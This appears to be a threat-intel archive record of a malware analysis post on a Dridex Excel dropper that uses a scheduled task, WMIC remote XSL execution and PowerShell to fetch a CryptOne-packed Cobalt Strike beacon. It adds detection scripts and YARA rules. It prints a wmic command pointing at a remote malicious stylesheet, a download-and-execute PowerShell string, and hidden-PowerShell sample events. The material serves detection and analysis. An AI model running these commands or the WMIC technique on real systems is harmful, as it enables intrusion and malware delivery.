{
	"id": "fbbad598-d8fb-4aa3-9a0a-bc8e34cd7f2d",
	"created_at": "2026-04-06T00:08:55.095726Z",
	"updated_at": "2026-04-10T13:12:16.574526Z",
	"deleted_at": null,
	"sha1_hash": "395e66c042c24d580e10e4a8713b3361b7bd32b9",
	"title": "Dridex Document to Cobalt Strike – Malware Book Reports",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 95394,
	"plain_text": "Dridex Document to Cobalt Strike – Malware Book Reports\r\nBy muzi\r\nArchived: 2026-04-05 19:37:51 UTC\r\nOn June 30th, 2021, Dridex Excel documents were observed downloading Cobalt Strike packed with the CryptOne packer – skipping the typical in-between step of downloading Dridex.\r\nFilename: attachment_filenameUTF-8WO202825876.xlsb (the attachment_filenameUTF-8 prefix appears to be residue of the Content-Disposition header; the attachment name itself is WO202825876.xlsb)\r\nMD5: 56d9a0db8defe0857dd4bb7c9af97ee2\r\nSHA1: abf0d796220d5e8ba7a5cc3f5ed2421411a5fb56\r\nSHA256: a0747e6e54af1fde0586add639282d26b5e22a0bb4e4cca5d362c6eb6f6f3ed4\r\nExcel Document Dropper\r\nFigure 1: Excel Document Dropper\r\nThe Dridex document dropper was delivered as an .xlsb attachment. When opened, it displays the image above, claiming that the document is encrypted and protected by GlobalSign®, and prompts the user to ‘Enable Content’, which runs the malicious VBA macros.\r\nUnlike many maldocs, the VBA contained in this Excel document is fairly straightforward. The VBA creates a scheduled task which fires 68 seconds after the macro runs (a delay of this kind is a common way to outlast short automated sandbox runs). The command line of the scheduled task is stored in the cells of the GlocalSign Protected sheet, which is the sheet displayed when the document is opened. The data in cell range BG63:EL175 are concatenated to form the scheduled task command, stored in the xAccounting3 variable. Next, the trigger time is appended and the result is stored in the variable xWKS.\r\nFigure 2: VBA Macro\r\nThe author was also nice enough to include the Debug.Print xWKS statement, which prints out the scheduled task that is created. 
The scheduled task abuses a living-off-the-land technique, WMIC remote XSL JScript execution (XSL Script Processing, MITRE ATT&CK T1220): wmic.exe accepts an XSL stylesheet through its /format: switch, the stylesheet may carry script blocks, and nothing stops /format: from pointing at a remote URL, so a Microsoft-signed binary becomes the downloader and script host.\r\nFigure 3: Scheduled Task Created by VBA Macro\r\nXSL Second Stage\r\nFilename: FNzCMeQWqRMmewW.xsl\r\nMD5: a5c64d06c553216741e1441a26a9f44b\r\nSHA1: 218bd229168f6da1821128548a455798b77089ff\r\nSHA256: 09ffc962612f1d28e72b59b9a2c7c8f24aa058a3198c80a9d3180445870c3e88\r\nThe next stage, an XSL file, is executed from the scheduled task described above via the command wmic os get /format:\"\u003clink_to_malicious_xsl\u003e\". The XSL file contains multiple blocks of obfuscated JScript. Even obfuscated, these code blocks give away enough hints for an educated guess at what the code does.\r\nFigure 4: Snippet of XSL File Containing JScript\r\nFigure 5: Snippet of XSL File Containing PowerShell Command\r\nBased on the code snippets above, it can be inferred that the main goal of the JScript inside the XSL file is to download and execute a payload from one of the URLs in the array zyalpyuauvojieqf using PowerShell.\r\nOnce this obfuscated code is deobfuscated and cleaned up, it is very straightforward: the code downloads the payload into the current user’s %APPDATA% directory and executes it from there.\r\nFigure 6: Deobfuscated/cleaned XSL File\r\nThird Stage: Dridex… Wait, Actually Cobalt Strike\r\nFilename: 5H99AkSE5ER.php\r\nMD5: 2680d519097273ace671daf7ac0f9e8d\r\nSHA1: 6af97623ce61dee9f2d6331eb113e2c16831d00f\r\nSHA256: c5b39009be422e89c793241831efd12c6827de20a56b71783d4fd80db9409910\r\nOver the last couple of weeks, the Excel maldoc above had been observed delivering Dridex as the third-stage payload. In this case, rather than downloading Dridex, the actors behind this campaign (TA575, which runs botnet 22201) appear to have gone straight to dropping Cobalt Strike. 
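Detection logic for this stage, as an added example that is not part of the original post: it triages Sysmon-style process-creation events and flags wmic.exe runs whose /format: target is not one of WMIC's built-in output formats, and it uses the parent process to tell scheduled-task launches (typically the Schedule service host, svchost.exe ... -s Schedule, or taskeng.exe on older builds) from interactive ones. The event lines are constructed; every host name, URL and path in them is made up, and the built-in format allow-list is an assumption to be checked against the .xsl files in %SystemRoot%\System32\wbem on your own build.

```python
# Added example, not code from the original post: triage process-creation events
# for wmic.exe being pointed at a stylesheet that is not one of its built-ins
# (XSL Script Processing, as in the scheduled task described above).
# Events are constructed JSON lines in a Sysmon-like shape; hosts, URLs and
# paths in them are made up. BUILTIN_FORMATS is an assumed allow-list: check it
# against the .xsl files in %SystemRoot%\System32\wbem on your own build.
import json
import re

BUILTIN_FORMATS = {
    "csv", "hform", "htable", "htable-sortby", "list", "mof", "rawxml",
    "table", "texttable", "textvaluelist", "value", "xml",
}

# wmic / wmic.exe as a token, whether bare, quoted, or at the end of a path
_WMIC_RE = re.compile(r'(?:^|[\\/\s"])wmic(?:\.exe)?(?:"|\s|$)', re.IGNORECASE)
# /format:X where X is "quoted", 'quoted' or a bare token
_FORMAT_RE = re.compile(r"/format[:=]\s*(?:\"([^\"]*)\"|'([^']*)'|(\S+))", re.IGNORECASE)


def format_target(cmdline):
    """Value handed to /format:, or None when wmic is not run with one."""
    if not _WMIC_RE.search(cmdline):
        return None
    m = _FORMAT_RE.search(cmdline)
    if not m:
        return None
    return next(g for g in m.groups() if g is not None)


def classify_format(target):
    """'builtin', 'remote' (URL or UNC path), 'local-file' or 'unknown'."""
    t = target.strip().strip(",")
    if t.lower() in BUILTIN_FORMATS:
        return "builtin"
    if re.match(r"^(?:https?|ftp)://", t, re.IGNORECASE) or t.startswith("\\\\"):
        return "remote"
    if re.match(r"^[a-z]:\\", t, re.IGNORECASE) or t.lower().endswith(".xsl"):
        return "local-file"
    return "unknown"


def launched_by_scheduler(parent_cmdline):
    """Scheduled-task actions are normally spawned by the Schedule service host
    (svchost.exe ... -s Schedule) or, on older builds, by taskeng.exe."""
    p = parent_cmdline.lower()
    return "taskeng.exe" in p or ("svchost.exe" in p and "schedule" in p)


def triage(event_lines):
    """One finding per event whose wmic /format target is not a built-in format."""
    findings = []
    for line in event_lines:
        ev = json.loads(line)
        target = format_target(ev.get("CommandLine", ""))
        if target is None:
            continue
        verdict = classify_format(target)
        if verdict == "builtin":
            continue
        findings.append({
            "verdict": verdict,
            "target": target,
            "scheduled_task": launched_by_scheduler(ev.get("ParentCommandLine", "")),
        })
    return findings


# Constructed events: a benign built-in format, a remote XSL launched from a
# scheduled task (the pattern in this post), a UNC path, a local .xsl, and two
# events that must be ignored (no /format, and wmic only as the parent).
SAMPLE_EVENTS = [
    r'{"EventID": 1, "CommandLine": "wmic os get /format:list", "ParentCommandLine": "cmd.exe"}',
    r'{"EventID": 1, "CommandLine": "wmic os get /format:\"https://cdn.example.invalid/FNzCMeQWqRMmewW.xsl\"", "ParentCommandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"}',
    r'{"EventID": 1, "CommandLine": "WMIC.EXE process list /FORMAT:\\\\files.example.invalid\\share\\report.xsl", "ParentCommandLine": "explorer.exe"}',
    r'{"EventID": 1, "CommandLine": "\"C:\\Windows\\System32\\wbem\\wmic.exe\" os get /format:C:\\Users\\Public\\x.xsl", "ParentCommandLine": "powershell.exe"}',
    r'{"EventID": 1, "CommandLine": "wmic os get caption,version", "ParentCommandLine": "cmd.exe"}',
    r'{"EventID": 1, "CommandLine": "powershell -nop -w hidden -enc AAAA", "ParentCommandLine": "wmic.exe"}',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The allow-list approach matters more than the URL check: a local stylesheet dropped under a writable path is just as dangerous as a remote one, so anything that is not a bare built-in format name deserves a look.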
Going straight to Cobalt Strike instead of Dridex was likely done to get initial access into the hands of ransomware groups even faster.\r\nWhen opened in PE studio, this executable appears to be packed: there are a few extra PE sections, entropy is relatively high at 7.096, and the strings don’t provide much information. Diving into Ghidra and the disassembled code, one routine in particular stood out:\r\nFigure 7: CryptOne Packer Killswitch (RegKey Check)\r\nThe routine opens a hard-coded registry key with RegOpenKeyA and, if the call fails, spins in an infinite loop (mov reg,1 / test reg,reg / jz / jmp back to the mov). The hive handle is lightly obfuscated, for example 80000020h minus 20h or 80000002h minus 2, both of which give 80000000h, HKEY_CLASSES_ROOT. The effect is a kill switch: when the expected key is absent, the sample hangs instead of unpacking. The YARA rule in the Detection section keys on this sequence.\r\nThe CryptOne packer is a crypter that has previously been observed being used by WastedLocker, NetWalker, Gozi ISFB v3, ZLoader and SmokeLoader. The Emotet group has also used this packer. The following article provides a wealth of information on CryptOne and was an excellent resource during the analysis of this malware: https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/. According to the article by Ron Ben Yizhak of Deep Instinct:\r\nThe unpacking process is composed of two stages until the destined malware is executed. The first stage is the DLL that is created by the packing software. This DLL contains encrypted data in one of its sections, which is copied to a RWX buffer and then decrypted. This data contains a shellcode and another block of encrypted data.\r\nRon Ben Yizhak\r\nIn this sample, CryptOne first decrypts an embedded executable (the loader) and transfers execution to it.\r\nFigure 8: Decrypted Loader within CryptOne packed executable\r\nNext, after execution is transferred to the decrypted loader, RWX memory is allocated and another executable is written into it. Notice that the file starts with 4D5A (MZ) but is followed by 5245 (RE). 
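One way to turn the MZRE/MZAR observation into a triage tool, as an added example that is neither the author's code nor CobaltStrikeParser: it scans a raw memory dump for Magic MZ headers, discards hits whose e_lfanew does not land on a PE signature with a matching IMAGE_FILE_HEADER.Machine, and then locates and decodes the beacon's configuration table, the step the Cobalt Strike Config section below hands to CobaltStrikeParser. The config layout it assumes (big-endian index/type/length records, the whole table XOR'd with 0x2E for Beacon 4.x or 0x69 for 3.x, first record index 1 / type 1 / length 2, and the index-to-name mapping) comes from public Beacon analyses, not from this article, and the dump it scans is constructed rather than a real sample.

```python
# Added example, neither the author's code nor CobaltStrikeParser: scan a raw memory
# dump for a Cobalt Strike "Magic MZ" beacon image and decode its configuration.
# Assumed from public Beacon analyses, not from this post: the config is a table of
# records (big-endian u16 index, u16 type, u16 length, value) XOR'd with one byte
# (0x2E for Beacon 4.x, 0x69 for 3.x), starting with index 1 / type 1 / length 2.
# SAMPLE_DUMP at the bottom is constructed; it contains no real malware bytes.
import re
import struct

MAGIC_ARCH = {b"MZRE": "x86", b"MZAR": "x64"}
MACHINE_ARCH = {0x14C: "x86", 0x8664: "x64"}


def find_magic_mz(buf):
    """[(offset, arch)] for each MZRE/MZAR header that is backed by a real PE.

    Four magic bytes alone will hit random data, so also require that e_lfanew
    points at 'PE\\0\\0' inside the buffer and that IMAGE_FILE_HEADER.Machine
    agrees with the architecture the magic implies (RE: x86, AR: x64).
    """
    hits = []
    for m in re.finditer(rb"MZ(?:RE|AR)", buf):
        off = m.start()
        if off + 0x40 > len(buf):
            continue
        e_lfanew = struct.unpack_from("<I", buf, off + 0x3C)[0]
        pe = off + e_lfanew
        if e_lfanew < 0x40 or pe + 6 > len(buf) or buf[pe:pe + 4] != b"PE\x00\x00":
            continue
        machine = struct.unpack_from("<H", buf, pe + 4)[0]
        if MACHINE_ARCH.get(machine) == MAGIC_ARCH[m.group(0)]:
            hits.append((off, MAGIC_ARCH[m.group(0)]))
    return hits


CONFIG_XOR_KEYS = (0x2E, 0x69)           # Beacon 4.x, then 3.x
CONFIG_HEAD = bytes([0, 1, 0, 1, 0, 2])  # index 1 (BeaconType), type 1 (short), len 2
SETTING_NAMES = {1: "BeaconType", 2: "Port", 3: "SleepTime", 4: "MaxGetSize",
                 5: "Jitter", 8: "C2Server", 9: "UserAgent"}


def xor(data, key):
    return bytes(b ^ key for b in data)


def find_config(buf):
    """(offset, key) of the XOR'd config table, found via its encoded first record."""
    for key in CONFIG_XOR_KEYS:
        pos = buf.find(xor(CONFIG_HEAD, key))
        if pos != -1:
            return pos, key
    return None


def parse_config(buf, pos, key, max_size=4096):
    """Decode records until the index-0 end marker or the buffer runs out."""
    table = xor(buf[pos:pos + max_size], key)
    settings, i = {}, 0
    while i + 6 <= len(table):
        idx, typ, length = struct.unpack_from(">HHH", table, i)
        if idx == 0:
            break
        raw = table[i + 6:i + 6 + length]
        i += 6 + length
        if typ == 1 and length == 2:
            val = struct.unpack(">H", raw)[0]
        elif typ == 2 and length == 4:
            val = struct.unpack(">I", raw)[0]
        else:                                   # type 3: NUL-padded blob
            val = raw.rstrip(b"\x00").decode("latin-1")
        settings[SETTING_NAMES.get(idx, "setting_%d" % idx)] = val
    return settings


def scan_dump(buf):
    """Triage summary: Magic MZ images found plus the decoded config, if any."""
    found = find_config(buf)
    return {"beacons": find_magic_mz(buf),
            "config": parse_config(buf, *found) if found else {}}


# ---- constructed sample dump -------------------------------------------------
def _fake_pe(magic, machine):
    dos = magic + b"\x00" * (0x3C - 4) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    return dos + b"PE\x00\x00" + struct.pack("<H", machine) + b"\x00" * 18


def _record(idx, typ, value):
    return struct.pack(">HHH", idx, typ, len(value)) + value


_plain_config = (
    _record(1, 1, struct.pack(">H", 8))          # BeaconType 8 = HTTPS
    + _record(2, 1, struct.pack(">H", 443))
    + _record(3, 2, struct.pack(">I", 60000))    # sleep in ms
    + _record(5, 1, struct.pack(">H", 20))
    + _record(8, 3, b"c2.example.invalid,/ca".ljust(256, b"\x00"))
    + b"\x00" * 6                                # end marker
)

SAMPLE_DUMP = (
    b"\x90" * 64
    + b"MZRE" + b"\x00" * 60        # decoy: magic with no PE behind it, must be dropped
    + _fake_pe(b"MZRE", 0x14C)      # x86 Magic MZ image at offset 128
    + b"MZ\x90\x00" + b"\x00" * 60  # ordinary MZ header, must not be reported
    + xor(_plain_config, 0x2E)      # Beacon 4.x-style config at offset 280
    + b"\x90" * 64
)

if __name__ == "__main__":
    print(scan_dump(SAMPLE_DUMP))
```

Run it on a ProcessHacker or Volatility dump of the loader process; a Magic MZ hit without a decodable config usually means the beacon was still encrypted at dump time, so dump again after the reflective loader has run.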
MZRE and MZAR are indicators of Cobalt Strike Magic MZ: the reflective loader patches the DOS header so that its first bytes are valid instructions (on x86, 4D 5A 52 45 is dec ebp / pop edx / push edx / inc ebp; on x64, 4D 5A 41 52 is pop r10 / push r10, with 4D and 41 acting as REX prefixes), so execution can simply start at offset 0 of the image; the stub then calls the DLL’s export function, ReflectiveLoader@4, which maps the DLL into memory by itself.\r\nFigure 9: DLL by loader (Hint: MZRE –\u003e Beacon Magic MZ)\r\nFinally, after the DLL is written, it is executed via CreateRemoteThread, where the shellcode in the header calls the ReflectiveLoader@4 function.\r\nFigure 10: ReflectiveLoader Export\r\nAfter dumping the DLL and loading it into PE studio, there is additional evidence as to what the final payload is.\r\nFigure 11: Dump DLL using ProcessHacker\r\nFigure 12: PE Studio Detects beacon.dll as Original Filename\r\nCobalt Strike Config\r\nNow that the final payload has been identified as Cobalt Strike, the last step of analysis is to extract the configuration of the beacon payload. There are a variety of ways to do this:\r\nDebugging\r\nSandboxing in a tool such as tria.ge\r\nSentinelOne’s CobaltStrikeParser\r\nFor the sake of simplicity, SentinelOne’s CobaltStrikeParser was used to extract the Beacon config.\r\nFigure 13: Cobalt Strike Config\r\nDetection\r\nCryptOne Packer Yara Rule\r\nrule CryptOne_Packer {\r\n    meta:\r\n        author = \"muzi\"\r\n        date = \"06/30/2021\"\r\n        description = \"Detects CryptOne packer. 
Typically used to crypt Cobalt Strike, Gozi ISFB, Zloader and Smokeloader\"\r\n        references = \"https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/\"\r\n    strings:\r\n        /*\r\n        Packer makes cmp dword to 0 several times for no reason, then jumps (x64dbg listing):\r\n        0044D417 | 833D 88384500 00 | cmp dword ptr ds:[453888],0\r\n        0044D41E | 74 05            | je 5h99akse5er.44D425\r\n        0044D420 | E8 ABFFFFFF      | call 5h99akse5er.44D3D0\r\n        0044D425 | 833D 88384500 00 | cmp dword ptr ds:[453888],0\r\n        0044D42C | 74 05            | je 5h99akse5er.44D433\r\n        0044D42E | E8 2DFEFFFF      | call 5h99akse5er.44D260\r\n        0044D433 | 833D 88384500 00 | cmp dword ptr ds:[453888],0\r\n        0044D43A | 74 05            | je 5h99akse5er.44D441\r\n        0044D43C | E8 8FFFFFFF      | call 5h99akse5er.44D3D0\r\n        0044D441 | 833D 88384500 00 | cmp dword ptr ds:[453888],0\r\n        0044D448 | 74 05            | je 5h99akse5er.44D44F\r\n        0044D44A | E8 11FEFFFF      | call 5h99akse5er.44D260\r\n        0044D44F | 833D 88384500 00 | cmp dword ptr ds:[453888],0\r\n        0044D456 | 74 05            | je 5h99akse5er.44D45D\r\n        0044D458 | E8 03FEFFFF      | call 5h99akse5er.44D260\r\n        0044D45D | 833D 88384500 00 | cmp dword ptr ds:[453888],0\r\n        0044D464 | 74 0F            | je 5h99akse5er.44D475\r\n        */\r\n        $worthless_cmp = {\r\n            83 3D ?? ?? ?? 00 00 [0-8]   // cmp dword ptr [addr], 0\r\n            74 ?? [0-8]                  // je \u003caddress\u003e\r\n            (E8|FF) ?? ?? ?? ?? [0-8]    // call \u003cfunction\u003e\r\n            83 3D ?? ?? ?? 
00 00        // cmp dword ptr [addr], 0\r\n        }\r\n        /*\r\n        Registry key check (Ghidra listing; 80000020h - 20h = 80000000h = HKEY_CLASSES_ROOT):\r\n        0044d1c4 ff 15 4c 26 45 00   CALL dword ptr [-\u003eKERNEL32.DLL::GetLastError]\r\n        0044d1ca 83 f8 06            CMP EAX,0x6\r\n        0044d1cd 74 04               JZ LAB_0044d1d3\r\n        0044d1cf 33 c0               XOR EAX,EAX\r\n        LAB_0044d1d3:\r\n        0044d1d3 68 bc 38 45 00      PUSH DAT_004538bc\r\n        0044d1d8 8b 45 f8            MOV EAX,dword ptr [EBP + local_c]\r\n        0044d1db 50                  PUSH EAX=\u003eDAT_004521b4 = 35h\r\n        0044d1dc 8b 0d 34 21 45 00   MOV ECX,dword ptr [DAT_00452134] = 80000020h\r\n        0044d1e2 83 e9 20            SUB ECX,0x20\r\n        0044d1e5 51                  PUSH ECX\r\n        0044d1e6 ff 15 44 29 45 00   CALL dword ptr [-\u003eADVAPI32.DLL::RegOpenKeyA]\r\n        0044d1ec 89 45 fc            MOV dword ptr [EBP + local_8],EAX\r\n        0044d1ef 83 7d fc 00         CMP dword ptr [EBP + local_8],0x0\r\n        0044d1f3 74 0b               JZ LAB_0044d200\r\n        LAB_0044d1f5:\r\n        0044d1f5 ba 01 00 00 00      MOV EDX,0x1\r\n        0044d1fa 85 d2               TEST EDX,EDX\r\n        0044d1fc 74 02               JZ LAB_0044d200\r\n        0044d1fe eb f5               JMP LAB_0044d1f5\r\n        */\r\n        $reg_key_check = {\r\n            (FF|E8) ?? ?? ?? ?? ??                                              // CALL dword ptr [-\u003eKERNEL32.DLL::GetLastError]\r\n            (83|93|A3|B3|C3|D3) (F8|F9|FA|FB|FC|FD|FE|FF) 06 [0-64]             // CMP \u003creg\u003e, 6\r\n            68 ?? ?? ?? ?? [0-8]                                                // PUSH data\r\n            (88|89|8A|8B|8C) (45|4D|55|5D|6D|75|7D) (F?|E?|D?|C?|B?|A?) [0-8]   // MOV \u003creg\u003e, [ebp + offset]\r\n            5? [0-8]                                                            // PUSH \u003creg\u003e\r\n            (88|89|8A|8B|8C) (0d|15|1d|25|2d|35|3d) ?? ?? ?? ?? [0-24]          // MOV \u003creg\u003e, dword ptr [addr]\r\n            ff ?? ?? ?? ?? ?? [0-8]                                             // CALL dword ptr [-\u003eADVAPI32.DLL::RegOpenKeyA]\r\n            (88|89|8A|8B|8C) 45 (F8|F9|FA|FB|FC|FD|FE|FF) [0-8]                 // MOV [EBP + local_8], \u003creg\u003e\r\n            83 (78|79|7A|7B|7D|7E|7F) (F8|F9|FA|FB|FC|FD|FE|FF) 00 [0-8]        // CMP dword ptr [EBP + local_8], 0\r\n            (E2|EB|72|74|75|7C) ?? [0-64]                                       // Conditional JMP\r\n            (B8|B9|BA|BB|BD|BE|BF) 01 00 00 00 [0-8]                            // MOV \u003creg\u003e, 0x1\r\n            (84|85) (D0|D1|D2|D3|D5|D6|D7) [0-8]                                // TEST \u003creg\u003e,\u003creg\u003e\r\n            (E2|EB|72|74|75|7C) ?? 
[0-8]                                       // Loop/Conditional JMP\r\n            (E2|EB|72|74|75|7C) ??                                              // Loop/Conditional JMP\r\n        }\r\n        /*\r\n        Variant of the check at another location (Ghidra listing):\r\n        00401e6f 81 ea ad 0c 00 00   SUB EDX,0xcad\r\n        00401e75 52                  PUSH EDX\r\n        00401e76 ff 15 5c b4 4e 00   CALL dword ptr [DAT_004eb45c]\r\n        00401e7c 89 45 fc            MOV dword ptr [EBP + local_8],EAX\r\n        00401e7f 83 7d fc 00         CMP dword ptr [EBP + local_8],0x0\r\n        00401e83 74 0b               JZ LAB_00401e90\r\n        LAB_00401e85:\r\n        00401e85 b8 01 00 00 00      MOV EAX,0x1\r\n        00401e8a 85 c0               TEST EAX,EAX\r\n        00401e8c 74 02               JZ LAB_00401e90\r\n        00401e8e eb f5               JMP LAB_00401e85\r\n        LAB_00401e90:\r\n        00401e90 e8 0b f4 ff ff      CALL FUN_004012a0\r\n        00401e95 a3 78 a1 4e 00      MOV [DAT_004ea178],EAX = 00000042h\r\n        00401e9a 8b e5               MOV ESP,EBP\r\n        00401e9c 5d                  POP EBP\r\n        00401e9d c3                  RET\r\n        */\r\n        $reg_key_check_2 = {\r\n            (80|81|82|83) ?? ?? ?? ?? ?? [0-8]                                  // SUB\r\n            (50|51|52|53|55|56|57) [0-8]                                        // PUSH\r\n            ff ?? ?? ?? ?? ?? [0-8]                                             // CALL\r\n            (88|89|8A|8B|8C) 45 (F8|F9|FA|FB|FC|FD|FE|FF) [0-8]                 // MOV [EBP + local_8], \u003creg\u003e\r\n            (83|93|A3|B3|C3|D3) (78|79|7A|7B|7D|7E|7F) (F8|F9|FA|FB|FC|FD|FE|FF) 00 [0-8] // CMP dword ptr [EBP + local_8], 0\r\n            (E2|EB|72|74|75|7C) ?? [0-8]                                        // Conditional JMP\r\n            (B8|B9|BA|BB|BD|BE|BF) 01 00 00 00 [0-8]                            // MOV \u003creg\u003e, 0x1\r\n            (84|85) (C0|C1|C2|C3|C4|C5|C6|C7) [0-8]                             // TEST \u003creg\u003e,\u003creg\u003e\r\n            (E2|EB|72|74|75|7C) ?? [0-8]                                        // Conditional JMP\r\n            (E2|EB|72|74|75|7C) ?? 
// Infinite loop\r\n        }\r\n        /*\r\n        Third variant; 80000002h - 2 = 80000000h = HKEY_CLASSES_ROOT (Ghidra listing):\r\n        00402d35 50                  PUSH EAX=\u003eu_aaaerfacE\\{b196b287-bab4-101a-b6_00527800 = u\"a aaerfacE\\\\{b19\r\n        00402d36 8b 0d fc 77 52 00   MOV ECX,dword ptr [DAT_005277fc] = 80000002h\r\n        00402d3c 83 e9 02            SUB ECX,0x2\r\n        00402d3f 51                  PUSH ECX\r\n        00402d40 ff 55 f8            CALL dword ptr [EBP + local_c]\r\n        00402d43 89 45 fc            MOV dword ptr [EBP + local_8],EAX\r\n        00402d46 83 7d fc 00         CMP dword ptr [EBP + local_8],0x0\r\n        00402d4a 74 0b               JZ LAB_00402d57\r\n        LAB_00402d4c:\r\n        00402d4c ba 01 00 00 00      MOV EDX,0x1\r\n        00402d51 85 d2               TEST EDX,EDX\r\n        00402d53 74 02               JZ LAB_00402d57\r\n        00402d55 eb f5               JMP LAB_00402d4c\r\n        */\r\n        $reg_key_check_3 = {\r\n            (50|51|52|53|55|56|57) [0-8]                                        // PUSH\r\n            (88|89|8A|8B|8C) (0d|15|1d|25|2d|35|3d) ?? ?? ?? ?? [0-8]           // MOV \u003creg\u003e, dword ptr [addr]\r\n            (80|81|82|83) ?? ?? [0-8]                                           // SUB\r\n            (50|51|52|53|55|56|57) [0-8]                                        // PUSH\r\n            ff ?? ?? [0-8]                                                      // CALL\r\n            (88|89|8A|8B|8C) 45 (F8|F9|FA|FB|FC|FD|FE|FF) [0-8]                 // MOV [EBP + local_8], \u003creg\u003e\r\n            (83|93|A3|B3|C3|D3) (78|79|7A|7B|7D|7E|7F) (F8|F9|FA|FB|FC|FD|FE|FF) 00 [0-8] // CMP dword ptr [EBP + local_8], 0\r\n            (E2|EB|72|74|75|7C) ?? [0-8]                                        // Conditional JMP\r\n            (B8|B9|BA|BB|BD|BE|BF) 01 00 00 00 [0-8]                            // MOV \u003creg\u003e, 0x1\r\n            (84|85) (D0|D1|D2|D3|D4|D5|D6|D7) [0-8]                             // TEST \u003creg\u003e,\u003creg\u003e\r\n            (E2|EB|72|74|75|7C) ?? [0-8]                                        // Conditional JMP\r\n            (E2|EB|72|74|75|7C) ??                                              // Infinite loop\r\n        }\r\n        /*\r\n        Infinite loop check: the malware always checks for a certain registry key and, if it does not exist, loops forever\r\n        */\r\n        $inf_loop_eax = { B8 01 00 00 00 85 C0 7? 0? EB F? }\r\n        $inf_loop_ecx = { B9 01 00 00 00 85 C9 7? 0? EB F? }\r\n        $inf_loop_edx = { BA 01 00 00 00 85 CA 7? 0? EB F? }\r\n        $inf_loop_ebx = { BB 01 00 00 00 85 CB 7? 0? EB F? }\r\n        $inf_loop_ebp = { BD 01 00 00 00 85 CD 7? 0? EB F? }\r\n        $inf_loop_esi = { BE 01 00 00 00 85 CE 7? 0? EB F? }\r\n        $inf_loop_edi = { BF 01 00 00 00 85 CF 7? 
0? EB F? }\r\n    condition:\r\n        (#worthless_cmp \u003e= 3 and ($reg_key_check or $reg_key_check_2 or $reg_key_check_3)) or\r\n        $reg_key_check_3 or\r\n        any of ($inf_loop_*)\r\n}\r\nNote that a single $inf_loop_* hit (a ten-byte mov/test/jz/jmp sequence) or a single $reg_key_check_3 match is enough for this rule to fire on its own; run it over a clean-file corpus and tune the condition before deploying it for blocking rather than hunting.\r\nCobalt Strike Beacon Yara Rule\r\nrule Cobalt_Strike_Beacon {\r\n    meta:\r\n        author = \"muzi\"\r\n        date = \"2021-07-04\"\r\n    strings:\r\n        $s1 = \"MZRE\"\r\n        $s2 = \"MZAR\"\r\n        $s3 = \"could not run command (w/ token) because of its length of %d bytes!\"\r\n        $s4 = \"could not spawn %s (token): %d\"\r\n        $s5 = \"could not spawn %s: %d\"\r\n        $s6 = \"Could not open process token: %d (%u)\"\r\n        $s7 = \"could not run %s as %s\\\\%s: %d\"\r\n        $s8 = \"could not upload file: %d\"\r\n        $s9 = \"could not open %s: %d\"\r\n        $s10 = \"could not get file time: %d\"\r\n        $s11 = \"could not set file time: %d\"\r\n        $s12 = \"Could not connect to pipe (%s): %d\"\r\n        $s13 = \"Could not open service control manager on %s: %d\"\r\n        $s14 = \"Could not create service %s on %s: %d\"\r\n        $s15 = \"Could not start service %s on %s: %d\"\r\n        $s16 = \"Failed to impersonate token: %d\"\r\n        $s17 = \"ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.\"\r\n        $s18 = \"could not write to process memory: %d\"\r\n        $s19 = \"could not create remote thread in %d: %d\"\r\n        $s20 = \"%d is an x64 process (can't inject x86 content)\"\r\n        $s21 = \"%d is an x86 process (can't inject x64 content)\"\r\n        $s22 = \"Could not connect to pipe: %d\"\r\n        $s23 = \"kerberos ticket use failed: %08x\"\r\n        $s24 = \"could not connect to pipe: %d\"\r\n        $s25 = \"Maximum links reached. 
Disconnect one\"\r\n        $s26 = \"IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')\"\r\n        $s27 = \"I'm already in SMB mode\"\r\n        $s28 = \"Failed to duplicate primary token for %d (%u)\"\r\n        $s29 = \"Failed to impersonate logged on user %d (%u)\"\r\n        $s30 = \"LibTomMath\"\r\n        $s31 = \"beacon.dll\"\r\n        $s32 = \"ReflectiveLoader@4\"\r\n    condition:\r\n        6 of them\r\n}\r\nCobalt Strike Magic MZ Yara Rule\r\nrule Cobalt_Strike_Magic_MZ {\r\n    meta:\r\n        author = \"muzi\"\r\n        date = \"2021-07-04\"\r\n    condition:\r\n        uint32be(0) == 0x4D5A5245 or uint32be(0) == 0x4D5A4152\r\n}\r\nBoth Cobalt Strike rules are meant for memory: the beacon DLL only exists unpacked in process memory (the on-disk artifact is the CryptOne-packed 5H99AkSE5ER.php), so run them over a dumped module or an extracted memory region, as in Figure 11, rather than over files on disk. The Magic MZ rule reads offset 0 of whatever it is given and nothing else, so it fits dumped modules, not live process scans, and a hit on its own should be confirmed with the string rule or a PE-header sanity check.\r\nSource: https://malwarebookreports.com/cryptone-cobalt-strike/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://malwarebookreports.com/cryptone-cobalt-strike/"
	],
	"report_names": [
		"cryptone-cobalt-strike"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7583fbd4-2bc9-458d-81da-50b27b84e136",
			"created_at": "2023-02-15T02:01:49.565258Z",
			"updated_at": "2026-04-10T02:00:03.349283Z",
			"deleted_at": null,
			"main_name": "TA575",
			"aliases": [],
			"source_name": "MISPGALAXY:TA575",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434135,
	"ts_updated_at": 1775826736,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/395e66c042c24d580e10e4a8713b3361b7bd32b9.pdf",
